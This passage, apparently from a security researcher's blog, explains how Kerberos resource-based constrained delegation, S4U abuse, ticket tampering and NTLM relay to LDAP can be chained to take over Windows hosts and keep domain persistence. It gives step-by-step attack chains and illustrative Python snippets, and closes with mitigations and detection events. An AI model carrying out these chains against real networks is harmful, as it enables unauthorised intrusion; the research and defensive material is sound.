The FORWARDABLE flag is never set for accounts that are configured as “sensitive for delegation” (the USER_NOT_DELEGATED attribute is set to true) or for members of the Protected Users group. Protocol Transition (S4U2Self/TrustedToAuthForDelegation): S4U2Proxy requires the service to present a TGS for the user to itself before the authentication service produces a TGS for the user to another service. It is often referred to as the “additional ticket”, but I like referring to it as “evidence” that the user has indeed authenticated to the service invoking S4U2Proxy. However, sometimes users authenticate to services via other protocols, such as NTLM or even form-based authentication, and so they do not send a TGS to the service. In such cases, a service can invoke S4U2Self to ask the authentication service to produce a TGS for arbitrary users to itself, which can then be used as “evidence” when invoking S4U2Proxy. This feature allows impersonating users out of thin air, and it is only possible when the TrustedToAuthForDelegation flag is set for the service account that invokes S4U2Self. The Other Constrained Delegation Back in October 2018, I collaborated with Will Schroeder (@harmj0y) to abuse resource-based constrained delegation as an ACL-based computer object takeover primitive. Will wrote an excellent post on this topic, which you should also read before continuing. Once again, in that post, Will explained it better than I ever could, but I will try to capture it very concisely here. In order to configure constrained delegation, one has to have the SeEnableDelegation Privilege, which is sensitive and typically only granted to Domain Admins. In order to give users/resources more independence, Resource-based Constrained Delegation was introduced in Windows Server 2012. Resource-based constrained delegation allows resources to configure which accounts are trusted to delegate to them. 
This flavour of constrained delegation is very similar to the classic constrained delegation but works in the opposite direction. Classic constrained delegation from account A to account B is configured on account A in the msDS-AllowedToDelegateTo attribute, and defines an “outgoing” trust from A to B, while resource-based constrained delegation is configured on account B in the msDS-AllowedToActOnBehalfOfOtherIdentity attribute, and defines an “incoming” trust from A to B. An important observation is that every resource can configure resource-based constrained delegation for itself. In my mind, it does make sense to allow resources to decide for themselves whom they trust. Will and I came up with the following abuse case to compromise a specific host: An attacker compromises an account that has the TrustedToAuthForDelegation flag set (“Service A”). The attacker additionally compromises an account with the rights to configure resource-based constrained delegation for the computer account of the target host (“Service B”). The attacker configures resource-based constrained delegation from Service A to Service B. The attacker invokes S4U2Self and S4U2Proxy as Service A to obtain a TGS for a privileged user to Service B to compromise the target host. The following diagram illustrates this abuse case: It is a nice trick, but compromising an account with the TrustedToAuthForDelegation flag set is not trivial. If only my crusade to defeat TrustedToAuthForDelegation had been more fruitful, it would come in handy for this abuse case. A Selfless Abuse Case: Skipping S4U2Self In an attempt to make the above ACL-based computer object takeover primitive more generic, I slightly modified Rubeus to allow skipping S4U2Self by letting the attacker supply the “evidence” TGS for the victim when invoking S4U2Proxy. Benjamin Delpy also made this modification to Kekeo back in April 2018; however, at the time of writing, Kekeo does not support resource-based constrained delegation.
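The msDS-AllowedToActOnBehalfOfOtherIdentity attribute described above does not hold a list of SPNs like msDS-AllowedToDelegateTo; it holds a security descriptor whose DACL grants access to the SIDs of the trusted accounts. As a minimal sketch (the SID below is a hypothetical placeholder for the attacker-controlled account, and the SDDL shape mirrors what tooling such as PowerView/Powermad commonly writes):

```python
# Sketch: building the SDDL form of the security descriptor that gets
# written to msDS-AllowedToActOnBehalfOfOtherIdentity on the target
# resource ("Service B"). One allow-ACE per trusted account SID.

def rbcd_sddl(trusted_sids):
    """SDDL for an "incoming" delegation descriptor; owner is set to
    BUILTIN\\Administrators (BAD), as commonly produced by tooling."""
    aces = "".join(
        f"(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;{sid})" for sid in trusted_sids
    )
    return f"O:BAD:{aces}"

# Hypothetical SID of the attacker-controlled "Service A" account:
service_a_sid = "S-1-5-21-1111111111-2222222222-3333333333-1105"
print(rbcd_sddl([service_a_sid]))
# O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1111111111-2222222222-3333333333-1105)
```

In practice the SDDL is converted to a binary security descriptor and written to the attribute over LDAP, which is exactly the write primitive the relay-based attack chains later in this post rely on.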
The more generic abuse case would work as follows: The attacker compromises Service A and the DACL to configure resource-based constrained delegation on Service B. By way of social engineering or a watering hole attack, the victim authenticates to Service A to access a service (e.g. CIFS or HTTP). The attacker dumps the TGS of the victim to Service A, using Mimikatz sekurlsa::tickets or through another method. The attacker configures resource-based constrained delegation from Service A to Service B. The attacker uses Rubeus to perform S4U2Proxy with the TGS previously obtained as the required “evidence”, from Service A to Service B for the victim. The attacker can pass-the-ticket and impersonate the victim to access Service B. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/7odfALcmldo Note that the resulting TGS in the S4U2Proxy response (to Service B) seems to have the FORWARDABLE flag set, unless the principal is marked as sensitive for delegation or is a member of the Protected Users group. Serendipity As I was testing my Rubeus modification in preparation for submitting a pull request, I reset the TrustedToAuthForDelegation UserAccountControl flag on Service A and expected to see an error message when performing S4U2Self. However, S4U2Self worked, as well as S4U2Proxy, and the resulting TGS provided me with access to Service B. The ticket I obtained from S4U2Self was not forwardable, and still, S4U2Proxy accepted it and responded with a TGS for the user to Service B. At this point, I was wondering whether I completely misconfigured my lab environment. Video demonstration of this scenario: https://youtu.be/IZ6BJpr28r4 A Misunderstood Feature #1 After a couple more hours of testing, debugging, and reading MS-SFU, I realised that I had misunderstood S4U2Self. It seems S4U2Self works whether the TrustedToAuthForDelegation UserAccountControl flag is set or not.
However, if it is not set, the resulting TGS is not FORWARDABLE, as per section 3.2.5.1.2 of MS-SFU: “If the TrustedToAuthenticationForDelegation parameter on the Service 1 principal is set to: TRUE: the KDC MUST set the FORWARDABLE ticket flag ([RFC4120] section 2.6) in the S4U2self service ticket. FALSE and ServicesAllowedToSendForwardedTicketsTo is nonempty: the KDC MUST NOT set the FORWARDABLE ticket flag ([RFC4120] section 2.6) in the S4U2self service ticket.” A Misunderstood Feature #2 So, S4U2Proxy still shouldn’t have worked with a non-forwardable ticket, right? When I attempted invoking S4U2Proxy with a non-forwardable TGS with classic (“outgoing”) constrained delegation, it failed. But with resource-based constrained delegation (“incoming”) it consistently worked. I thought it must be a bug, and so on 26/10/2018, I reported it to Microsoft Response Center (MSRC). As I was impatiently waiting for a response, I read MS-SFU again and found section 3.2.5.2: “If the service ticket in the additional-tickets field is not set to forwardable<20> and the PA-PAC-OPTIONS [167] ([MS-KILE] section 2.2.10) padata type has the resource-based constrained delegation bit: Not set, then the KDC MUST return KRB-ERR-BADOPTION with STATUS_NO_MATCH. Set and the USER_NOT_DELEGATED bit is set in the UserAccountControl field in the KERB_VALIDATION_INFO structure ([MS-PAC] section 2.5), then the KDC MUST return KRB-ERR-BADOPTION with STATUS_NOT_FOUND.” It seems like a design flaw, also known in Microsoft parlance as a “feature”. S4U2Proxy for resource-based constrained delegation works when provided with a non-forwardable TGS by design! Note that as per the above documentation, even though the TGS doesn’t have to be forwardable for resource-based constrained delegation, if the user is set as “sensitive for delegation”, S4U2Proxy will fail, which is expected. 
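The two MS-SFU excerpts above can be reduced to a short decision sketch. This is illustration only, not a KDC implementation: real KDCs evaluate many more conditions, and the spec's ServicesAllowedToSendForwardedTicketsTo corresponds to the msDS-AllowedToDelegateTo attribute:

```python
# Sketch of the KDC rules quoted above from MS-SFU 3.2.5.1.2 (S4U2Self)
# and 3.2.5.2 (S4U2Proxy), reduced to plain Python for illustration.

def s4u2self_forwardable(trusted_to_auth_for_delegation, allowed_to_delegate_to):
    """FORWARDABLE flag on the service ticket produced by S4U2Self."""
    if trusted_to_auth_for_delegation:
        return True                 # "protocol transition": forwardable
    if allowed_to_delegate_to:
        return False                # classic "Kerberos only": never forwardable
    # Not covered by the excerpt; the behaviour observed in this post is
    # also a non-forwardable ticket.
    return False

def s4u2proxy(evidence_forwardable, rbcd_bit_set, user_not_delegated):
    """Outcome of S4U2Proxy for a given "evidence" TGS."""
    if not evidence_forwardable:
        if not rbcd_bit_set:
            return "KRB-ERR-BADOPTION (STATUS_NO_MATCH)"
        if user_not_delegated:
            return "KRB-ERR-BADOPTION (STATUS_NOT_FOUND)"
    # Per MS-SFU, the ticket S4U2Proxy issues is always forwardable.
    return "TGS issued, FORWARDABLE"

# Classic constrained delegation rejects a non-forwardable evidence TGS,
# while resource-based constrained delegation accepts it:
print(s4u2proxy(False, rbcd_bit_set=False, user_not_delegated=False))
print(s4u2proxy(False, rbcd_bit_set=True, user_not_delegated=False))
```

The asymmetry in the second function is the entire "feature": the forwardability check on the evidence ticket is skipped whenever the resource-based constrained delegation bit is set, unless the impersonated user is marked as sensitive for delegation.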
Generic DACL Abuse These two misunderstood “features” mean that the only requirement for the ACL-based computer object takeover primitive is the DACL to configure resource-based constrained delegation on the computer object and another account. Any account with an SPN will do. Even just a TGT for the other account will be enough. The reason an SPN is required is that S4U2Self does not seem to work for accounts that do not have it. But any domain user can obtain an account with an SPN by abusing the MachineAccountQuota, which is set to 10 by default, and allows creating new computer accounts. When creating the new computer account, the user can set an SPN for it, or add one later on. Kevin Robertson (@NetSPI) implemented a tool called Powermad that allows doing that through LDAP. The generic abuse case would work as follows: The attacker compromises an account that has an SPN or creates one (“Service A”) and the DACL to configure resource-based constrained delegation on a computer account (“Service B”). The attacker configures resource-based constrained delegation from Service A to Service B. The attacker uses Rubeus to perform a full S4U attack (S4U2Self and S4U2Proxy) from Service A to Service B for a user with privileged access to Service B. The attacker can pass-the-ticket and impersonate the user to gain access to Service B. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/ayavtG7J_TQ Note that the TGS obtained from S4U2Self in step 3 is not forwardable, and yet it is accepted as “evidence” when invoking S4U2Proxy. A Forwardable Result When I inspected the resulting TGS in the S4U2Proxy response, it had the FORWARDABLE flag set. I provided S4U2Proxy with a non-forwardable TGS as “evidence” and got a forwardable TGS. Is this a bug or a feature? I went back to MS-SFU section 3.2.5.2.2, and found the following: “The KDC MUST reply with the service ticket where: The sname field contains the name of Service 2. 
The realm field contains the realm of Service 2. The cname field contains the cname from the service ticket in the additional-tickets field. The crealm field contains the crealm from the service ticket in the additional-tickets field. The FORWARDABLE ticket flag is set. The S4U_DELEGATION_INFO structure is in the new PAC.” It seems like it is another great feature: every TGS produced by S4U2Proxy is always forwardable. Empowering Active Directory Objects and Reflective Resource-Based Constrained Delegation When Microsoft introduced resource-based constrained delegation, it transformed users and computers into strong, independent AD objects, which are able to configure this new “incoming” delegation for themselves. By default, all resources have an Access Control Entry (ACE) that permits them to configure resource-based constrained delegation for themselves. However, if an attacker has credentials for the account, they can forge a silver ticket and gain access to it anyway. The problem with silver tickets is that, when forged, they do not have a PAC with a valid KDC signature. If the target host is configured to validate KDC PAC Signature, the silver ticket will not work. There may also be other security solutions that can detect silver ticket usage. However, if we have credentials for a computer account or even just a TGT, we can configure resource-based constrained delegation from that account to itself, and then use S4U2Self and S4U2Proxy to obtain a TGS for an arbitrary user. The abuse case would work as follows: The attacker compromises credentials or a TGT for a computer account (“Service A”). The attacker configures resource-based constrained delegation from Service A to itself. The attacker uses Rubeus to perform a full S4U attack and obtain a TGS for a user with privileged access to Service A. The attacker can pass-the-ticket and impersonate the user to access Service A. 
The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/63RoJrDMUFg This reflective resource-based constrained delegation is, in fact, equivalent to S4U2Self when the account has the TrustedToAuthForDelegation flag set (also known as “protocol transition”), as it allows the account to obtain a forwardable TGS for itself on behalf of users. However, if an account is configured for classic constrained delegation with “Kerberos only” (TrustedToAuthForDelegation is not set and msDS-AllowedToDelegateTo is not null), then the classic conditions take precedence over the resource-based conditions, and so S4U2Self responds with a non-forwardable TGS and S4U2Proxy fails. Note that this technique will only allow obtaining a TGS for a user as long as it is not set as “sensitive for delegation” and is not a member of the Protected Users group, as you can see in the screenshots below: Solving a Sensitive Problem Inspecting the above output closely indicates that S4U2Self works for a user marked as sensitive for delegation and a member of the Protected Users group. Closer inspection of the ticket shows that it does not have a valid service name, and it is not forwardable: But this can easily be changed because the service name is not in the encrypted part of the ticket. An attacker can use an ASN.1 editor to modify the SPN on the TGS obtained from S4U2Self, and turn it into a valid one. Once that is done, the attacker has a valid TGS. It is not forwardable, but it is fine for authenticating to the service: Video demonstration of this scenario: https://youtu.be/caXFG_vAr-w So, if an attacker has credentials or a TGT for a computer account, they can obtain a TGS to that computer for any user, including sensitive/protected users, with a valid KDC signature in the PAC. That means that obtaining a TGT for a computer account is sufficient to compromise the host. 
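The reason the ASN.1 edit above works is worth spelling out: the sname lives in the clear-text part of the ticket, while the part encrypted under the service account key does not cover it. A toy sketch under loose assumptions (a hash stands in for real Kerberos encryption, and the structures are simplified stand-ins, not real ASN.1):

```python
# Sketch: why rewriting the clear-text service name does not invalidate a
# ticket. The "encrypted part" binds the client identity and flags, but
# not the sname. SHA-256 is a stand-in for encryption under the service key.

import hashlib
from dataclasses import dataclass, replace

@dataclass(frozen=True)
class Ticket:
    sname: str          # clear-text service principal name
    enc_part: bytes     # opaque blob "encrypted" under the service account key

def issue(service_key: bytes, sname: str, client: str, flags: str) -> Ticket:
    blob = hashlib.sha256(service_key + client.encode() + flags.encode()).digest()
    return Ticket(sname=sname, enc_part=blob)

def service_accepts(service_key: bytes, t: Ticket, client: str, flags: str) -> bool:
    # The service only verifies the part protected by its key.
    expected = hashlib.sha256(service_key + client.encode() + flags.encode()).digest()
    return t.enc_part == expected

key = b"computer-account-key"
tgs = issue(key, "time/victim-host", "admin", "not-forwardable")

# Attacker rewrites the service name without touching the protected part:
tampered = replace(tgs, sname="cifs/victim-host")
print(service_accepts(key, tampered, "admin", "not-forwardable"))  # True
```

The same property is what later allows substituting the service class (e.g. "time" to "cifs") on a TGS obtained for a different service on the same host.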
When the Stars Align: Unconstrained Delegation Leads to RCE As Lee Christensen (@tifkin_) demonstrated in “the printer bug” abuse case study at DerbyCon 8, it is possible to trick the Printer Spooler into connecting back over SMB to a specified IP/hostname, by invoking the method RpcRemoteFindFirstPrinterChangeNotification (Opnum 62). If an attacker compromises a host with unconstrained delegation, “the printer bug” abuse can result in remote code execution on any domain-joined Windows host with the Printer Spooler running. The abuse case would work as follows: The attacker compromises a host with unconstrained delegation and elevates. The attacker runs the monitor/harvest module of Rubeus. The attacker launches SpoolSample or dementor.py to manipulate the Printer Spooler of the target host to delegate its TGT to the compromised host with unconstrained delegation. The attacker can use the captured TGT to obtain a TGS to the target host for any user, even sensitive for delegation/protected users. The attacker obtains a TGS to the target host for a user with local administrator rights and compromises it. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/XqxWHy9e_J8 As Will Schroeder (@harmj0y) explained in his blog post Not A Security Boundary: Breaking Forest Trusts, unconstrained delegation works across forest boundaries, making this attack effective across bidirectional forest trusts. When Accounts Collude - TrustedToAuthForDelegation Who? For years, Active Directory security experts have been telling us that if we must configure Kerberos delegation, constrained delegation is the way to go, and that we should use “Kerberos only” rather than “any authentication protocol” (also known as “protocol transition”). But perhaps the choice between “Kerberos only” and “Any authentication protocol” does not actually matter.
We now know that we can abuse resource-based constrained delegation to get a forwardable TGS for arbitrary users. It follows that if we have credentials (or a TGT) for an account with an SPN and for an account with classic constrained delegation but without “protocol transition”, we can combine these two “features” to mimic “protocol transition”. This abuse case would work as follows: The attacker compromises an account that has an SPN or creates one (“Service A”). The attacker compromises an account (“Service B”), which is set for classic constrained delegation to a certain service class at Service C with Kerberos only (TrustedToAuthForDelegation is not set on Service B, and msDS-AllowedToDelegateTo on Service B contains a service on Service C, such as “time/Service C”). The attacker sets resource-based constrained delegation from Service A to Service B (setting msDS-AllowedToActOnBehalfOfOtherIdentity on Service B to contain “Service A” using Service B credentials or a TGT for Service B). The attacker uses Service A credentials/TGT to perform a full S4U attack and obtain a forwardable TGS for the victim to Service B. The attacker uses Service B credentials/TGT to invoke S4U2Proxy with the forwardable TGS from the previous step, and obtain a TGS for the victim to time/Service C. The attacker can modify the service class of the resulting TGS, for example from “time” to “cifs”, because the service name is not protected. The attacker can pass-the-ticket to gain access to Service C. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/y37Eo9zHib8 Unconstrained Domain Persistence Once attackers compromise the domain, they can obviously configure resource-based constrained delegation on strategic objects, such as domain controllers, and obtain a TGS on-demand. But resource-based constrained delegation can also be configured to generate TGTs on-demand as a domain persistence technique.
Once the domain is compromised, resource-based constrained delegation can be configured from a compromised account to the krbtgt account to produce TGTs. The abuse case would work as follows: The attacker compromises the domain and an account that has an SPN or creates one (“Service A”). The attacker configures resource-based constrained delegation from Service A to krbtgt. The attacker uses Rubeus to perform a full S4U attack and obtain a TGS for an arbitrary user to krbtgt, which is, in fact, a TGT. The attacker can use the TGT to request a TGS to arbitrary services. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/1BU2BflUHxA In this scenario, the account Service A obtained a degree of power somewhat similar to that of the KDC in the sense that it can produce a TGT for arbitrary users. Arguably, more subtle persistence can be achieved through a new access control entry (ACE) to allow configuring resource-based constrained delegation on-demand, rather than leaving it in plain sight. Thinking Outside the Box: RCE/LPE Opportunities As shown above, if an attacker can compromise a host with unconstrained delegation, RCE can be achieved with “the printer bug” and S4U2Self. But unconstrained delegation is not a trivial condition, so I attempted to come up with an attack chain that does not require unconstrained delegation. As mentioned above, every resource has the rights to configure resource-based constrained delegation for itself, which can be done via LDAP. This primitive opens the door to RCE/LPE opportunities if an attacker is in a position to perform a successful NTLM relay of a computer account authentication to LDAP. The abuse case would work as follows: The attacker compromises an account that has an SPN or creates one (“Service A”). The attacker triggers a computer account authentication using a primitive such as “the printer bug”.
The attacker performs an NTLM relay of the computer account (“Service B”) authentication to LDAP on the domain controller. The attacker configures resource-based constrained delegation from Service A to Service B. The attacker uses Rubeus to perform a full S4U attack and obtain a TGS to Service B for a user that has local administrator rights on that host. The attacker can pass-the-ticket and gain RCE/LPE, depending on the primitive used to trigger the computer account authentication. The above scenario is straightforward and too good to be true. However, the reality is that NTLM relay is more complicated than it seems. NTLM Relay 101 NetNTLM is a challenge-response authentication protocol designed by Microsoft for Windows environments. In the NetNTLM protocol, three messages are exchanged: The client sends a NEGOTIATE message to request authentication and “advertise capabilities”. The server sends a CHALLENGE message that contains a random 8-byte nonce. The client sends an AUTHENTICATE message that contains a response to the challenge. The response is calculated using a cryptographic function with a key derived from the user’s password (the NTLM hash). The server validates the response to the challenge. If it is valid, authentication is successful. Otherwise, authentication fails. The protocol is susceptible to the following relay attack: An attacker in a man-in-the-middle position waits for an incoming NEGOTIATE message from a victim. The attacker relays the NEGOTIATE message to the target server. The target server sends a CHALLENGE message to the attacker. The attacker relays the CHALLENGE message to the victim. The victim generates a valid AUTHENTICATE message and sends it to the attacker. The attacker relays the valid AUTHENTICATE message to the target server. The target server accepts the AUTHENTICATE message and the attacker is authenticated successfully. 
The following diagram illustrates an NTLM relay attack: The NetNTLM protocol does not only provide authentication but can also facilitate a session key exchange for encryption (“sealing”) and signing. The client and the server negotiate whether sealing/signing is required through certain flags in the exchanged messages. The exchanged session key is RC4 encrypted using a key derived from the client’s NTLM hash. The client obviously holds the NTLM hash and can decrypt it. However, a domain member server does not hold the NTLM hash of domain users, but only of local users. When a domain user exchanges a session key with a member server, the member server uses the Netlogon RPC protocol to validate the client’s response to the challenge with a domain controller, and if a session key was exchanged then the key to decrypt it is calculated by the domain controller and provided to the member server. This separation of knowledge ensures that the member server does not obtain the NTLM hash of the client, and the domain controller does not obtain the session key. If the client and server negotiate a session key for signing, an attacker performing a relay attack can successfully authenticate, but will not be able to obtain the session key to sign subsequent messages, unless the attacker can obtain one of the following: The NTLM hash of the victim. Credentials for the computer account of the target server. Compromise a domain controller. However, if the attacker obtains any of the above, they do not need to perform an NTLM relay attack to compromise the target host or impersonate the victim, and this is the reason signing mitigates NTLM relay attacks. NTLM Relay 102 The goal is to perform a successful relay, without negotiating signing or encryption, from any protocol to LDAP. Most of the primitives I am aware of for eliciting a connection from a computer account are initiated by the SMB client or the RPC client, both of which always seem to negotiate signing. 
If signing was negotiated in the NTLM exchange, the LDAP service on domain controllers ignores all unsigned messages (tested on Windows Server 2016 and Windows Server 2012R2). The most obvious next move is to reset the flags that negotiate signing during the NTLM relay. However, Microsoft introduced a MIC (Message Integrity Code, I believe) to the NTLM protocol to prevent that. The MIC is sent by the client in the AUTHENTICATE message, and it protects the integrity of all three NTLM messages using HMAC-MD5 with the session key. If a single bit of the NTLM messages had been altered, the MIC would be invalid and authentication would fail. Not all clients support MIC, such as Windows XP/2003 and prior, and so it is not mandatory. So another thing to try would be omitting the MIC during the NTLM relay. However, there is a flag that indicates whether a MIC is present or not, and that flag is part of the “salt” used when calculating the NetNTLM response to the challenge. Therefore, if the MIC is removed and the corresponding flag is reset, then the NetNTLM response will be invalid and authentication will fail. Reflective NTLM Relay is Dead Traditionally, NTLM relay of computer accounts was performed reflectively, meaning from a certain host back to itself. Until MS08-068, it was commonly performed to achieve RCE by relaying from SMB to SMB. After it was patched, reflective cross-protocol NTLM relay was still possible, and was most commonly abused to achieve LPE in attacks such as Hot Potato. Cross-protocol reflective relay was patched in MS16-075, which killed reflective relays for good (or until James Forshaw brings it back). Rotten Potato/Juicy Potato is still alive and kicking, but it is a different flavour of reflective relay as it abuses local authentication, which ignores the challenge-response. Post MS16-075 many security researchers stopped hunting for primitives that elicit computer account authentication, because without reflection they were no longer valuable. 
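The MIC mechanics described above can be sketched briefly. The message layouts below are simplified stand-ins, not real NTLMSSP structures; the point is only that the MIC is an HMAC-MD5 over all three messages keyed with the session key, so flag-stripping by a relay is detectable:

```python
# Sketch: why a relay attacker cannot strip the signing flags when a MIC
# is present. The MIC covers NEGOTIATE, CHALLENGE and AUTHENTICATE, keyed
# with the session key the attacker does not have.

import hashlib
import hmac

def compute_mic(session_key: bytes, negotiate: bytes,
                challenge: bytes, authenticate: bytes) -> bytes:
    return hmac.new(session_key, negotiate + challenge + authenticate,
                    hashlib.md5).digest()

session_key = b"\x11" * 16   # exchanged between client and server only
neg  = b"NEGOTIATE|flags=SIGN,SEAL,MIC"
chal = b"CHALLENGE|nonce=01234567"
auth = b"AUTHENTICATE|response=...|flags=SIGN,SEAL,MIC"

client_mic = compute_mic(session_key, neg, chal, auth)

# Relay attacker strips the signing flags from the NEGOTIATE message:
tampered_neg = b"NEGOTIATE|flags=MIC"
server_view = compute_mic(session_key, tampered_neg, chal, auth)
print(hmac.compare_digest(client_mic, server_view))  # False -> rejected
```

Omitting the MIC entirely fails for the reason given above: the MIC-present flag is part of the "salt" of the NetNTLM challenge response, so resetting it invalidates the response itself.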
Viable NTLM Relay Primitives for RCE/LPE An RCE/LPE primitive would require one of the following: A client that does not negotiate signing, such as the web client on all Windows versions, including WebDAV clients. A client that does not support MIC in NTLM messages, such as Windows XP/2003 and prior. An LDAP service that does not ignore unsigned messages or does not verify the MIC on a domain controller that supports resource-based constrained delegation. I don’t believe that this unicorn exists. There are different primitives for triggering the computer account to authenticate over HTTP. Some of them were abused in Hot Potato. I chose to explore those that take an arbitrary UNC path and then trigger a WebDAV client connection. Note that on Windows servers, the WebDAV client is not installed by default. On Windows Server 2012R2 and prior, the Desktop Experience feature is required, and on Windows Server 2016 or later, the WebDAV Redirector feature is required. However, on desktops, the WebDAV client is installed by default. As I mentioned above, it seems that some researchers no longer care for such primitives. However, as Lee Christensen (@tifkin_) demonstrated with the combination of “the printer bug” and unconstrained delegation, and as I will demonstrate below, these primitives are still exploitable, and I encourage everyone to keep hunting for them (and tell me all about it when you find them). Getting Intranet-Zoned By default, the web client will only authenticate automatically to hosts in the intranet zone, which means that no dots can be present in the hostname. If the relay server already has a suitable DNS record, then this is not an issue. However, if the relay server is “rogue”, an IP address will not cut it. To overcome that, ADIDNS can be abused to add a new DNS record for the relay server, as Kevin Robertson (@NetSPI) explained in his blog post Exploiting Active Directory-Integrated DNS. 
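The intranet-zone constraint above can be made concrete with a small sketch. Assumptions flagged loudly: "rogue" is a hypothetical single-label hostname added via ADIDNS, and the @80 UNC syntax is the commonly used trick for steering a UNC path to the WebDAV client over HTTP rather than SMB:

```python
# Sketch: default zone mapping and the WebDAV-style UNC path used by the
# HTTP-based trigger primitives. Dotless hostnames fall into the intranet
# zone, where the web client will authenticate automatically.

def will_auto_authenticate(host: str) -> bool:
    """Default behaviour: automatic NTLM auth only for dotless names."""
    return "." not in host

def webdav_unc(host: str, path: str = "x") -> str:
    # "@80" routes the connection to the WebDAV redirector over HTTP.
    return rf"\\{host}@80\{path}"

print(will_auto_authenticate("10.0.0.99"))  # False - contains dots
print(will_auto_authenticate("rogue"))      # True  - single-label name
print(webdav_unc("rogue"))                  # \\rogue@80\x
```

This is why a rogue relay server reachable only by IP address is not enough, and why the ADIDNS record mentioned above matters.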
Case Study 1: MSSQL RCE/LPE MSSQL has an undocumented stored procedure called xp_dirtree that lists the files and folders of a provided path. By default, this stored procedure is accessible to all authenticated users (“Public”). Under the following conditions, an attacker can achieve RCE/LPE (depending mainly on connectivity) by abusing the xp_dirtree stored procedure: The attacker has compromised a user permitted to invoke the xp_dirtree stored procedure. The MSSQL service is running as Network Service, Local System, or a Virtual Account (default). The WebDAV client is installed and running on the target host. The abuse case would work as follows: The attacker compromises credentials or a TGT for an account that has an SPN or creates one (“Service A”), and an account permitted to connect and invoke xp_dirtree on the target MSSQL instance. If required, the attacker uses Service A to add a DNS record using ADIDNS. The attacker logs in to the MSSQL service on the target host (“Service B”) and invokes xp_dirtree to trigger a connection to a rogue WebDAV NTLM relay server. The attacker relays the computer account NTLM authentication to the LDAP service on the domain controller, and configures resource-based constrained delegation from Service A to Service B. The attacker uses Rubeus to perform a full S4U attack to obtain a TGS to Service B for a user that has local administrator privileges on the target host. The attacker can pass-the-ticket to compromise the target host. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/nL2oa3URkCs Matt Bush (@3xocyte) implemented “Bad Sequel” as a PoC exploit for this scenario. Case Study 2: Windows 10/2016/2019 LPE One late night, Matt Bush (@3xocyte), Danyal Drew (@danyaldrew) and I brainstormed ideas on where to find suitable RCE/LPE primitives, and decided to explore what happens when a user changes the account picture in Windows 10/2016/2019.
We analysed it with Process Monitor and quickly found that during the account picture change SYSTEM opens the picture file to read its attributes. It is a small and meaningless operation; not an arbitrary file write/read/delete. But we are humble people, and that is all we wanted. The abuse case would work as follows: The attacker compromises credentials or a TGT for an account that has an SPN or creates one (“Service A”). The attacker gains unprivileged access to another computer running Windows 10 or Windows Server 2016/2019 with the WebDAV Redirector feature installed (“Service B”). If required, the attacker uses Service A to add a DNS record using ADIDNS. The attacker changes the account profile picture to a path on a rogue WebDAV NTLM relay server. The attacker relays the computer account NTLM authentication to the LDAP service on the domain controller, and configures resource-based constrained delegation from Service A to Service B. The attacker uses Rubeus to perform a full S4U attack to obtain a TGS to Service B for a user that has local administrator privileges on it. The attacker can pass-the-ticket to compromise Service B. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/741uz0ILxCA Mitigating Factors Accounts marked as sensitive for delegation or members of the Protected Users group are not affected by the attacks presented here, except for the S4U2Self abuse. However, computer accounts are affected, and in my experience they are never marked as sensitive for delegation or added to the Protected Users group. I did not thoroughly test the effects of setting computer accounts as sensitive for delegation or adding them to the Protected Users group, so I cannot recommend doing that, but I do recommend exploring it. 
As Lee Christensen (@tifkin_) demonstrated in "the printer bug" abuse case study at DerbyCon 8, obtaining a TGT/TGS for a domain controller allows performing "dcsync" and compromising the domain. As demonstrated above, with resource-based constrained delegation, obtaining a TGT for any computer account allows impersonating users to it and potentially compromising the host. Therefore, it is important not to configure any host for unconstrained delegation, because it can facilitate the compromise of other hosts within the forest and within other forests with bidirectional trust.
LDAP signing with channel binding can mitigate the RCE and LPE attack chains described in the case studies above.
The RCE/LPE attack chains that involve NTLM relay to LDAP abuse a default ACE that permits Self to write msDS-AllowedToActOnBehalfOfOtherIdentity. Adding a new ACE that denies Self from writing to the attribute msDS-AllowedToActOnBehalfOfOtherIdentity will interrupt these attack chains, which will then have to fall back to abusing that primitive in conjunction with unconstrained delegation. If your organisation does not use resource-based constrained delegation, you can consider adding an ACE that blocks Everyone from writing to the attribute msDS-AllowedToActOnBehalfOfOtherIdentity.
Detection
The following events can be used in the implementation of detection logic for the attacks described in this post:
S4U2Self: S4U2Self can be detected in a Kerberos service ticket request event (Event ID 4769), where the Account Information and Service Information sections point to the same account.
S4U2Proxy: S4U2Proxy can be detected in a Kerberos service ticket request event (Event ID 4769), where the Transited Services attribute in the Additional Information is not blank. 
Unconstrained Domain Persistence: The domain persistence technique described above can be detected in a Kerberos service ticket request event (Event ID 4769), where the Transited Services attribute in the Additional Information is not blank (indicating S4U2Proxy), and the Service Information points to the "krbtgt" account.
msDS-AllowedToActOnBehalfOfOtherIdentity: If an appropriate SACL is defined, then resource-based constrained delegation configuration changes can be detected in directory service object modification events (Event ID 5136), where the LDAP Display Name is "msDS-AllowedToActOnBehalfOfOtherIdentity". Events where the subject identity and the object identity are the same may be an indicator for some of the attacks presented above.
A Word of Advice from Microsoft
Microsoft did highlight the risk of S4U2Proxy in section 5.1 of MS-SFU: "The S4U2proxy extension allows a service to obtain a service ticket to a second service on behalf of a user. When combined with S4U2self, this allows the first service to impersonate any user principal while accessing the second service. This gives any service allowed access to the S4U2proxy extension a degree of power similar to that of the KDC itself. This implies that each of the services allowed to invoke this extension have to be protected nearly as strongly as the KDC and the services are limited to those that the implementer knows to have correct behavior."
S4U2Proxy is a dangerous extension that should be restricted as much as possible. However, the introduction of resource-based constrained delegation allows any account to permit arbitrary accounts to invoke S4U2Proxy, by configuring "incoming" delegation to itself. So should we protect all accounts as strongly as the KDC?
Author
Elad Shamir (@elad_shamir) from The Missing Link Security. 
Acknowledgements
Will Schroeder (@harmj0y), Lee Christensen (@tifkin_), Matt Bush (@3xocyte), and Danyal Drew (@danyaldrew) for bouncing off ideas and helping me figure this out.
Will Schroeder (@harmj0y) for Rubeus.
Matt Bush (@3xocyte) for dementor.py, helping implement the WebDAV NTLM relay server, and implementing Bad Sequel.
Lee Christensen (@tifkin_) for discovering "the printer bug" and implementing SpoolSample.
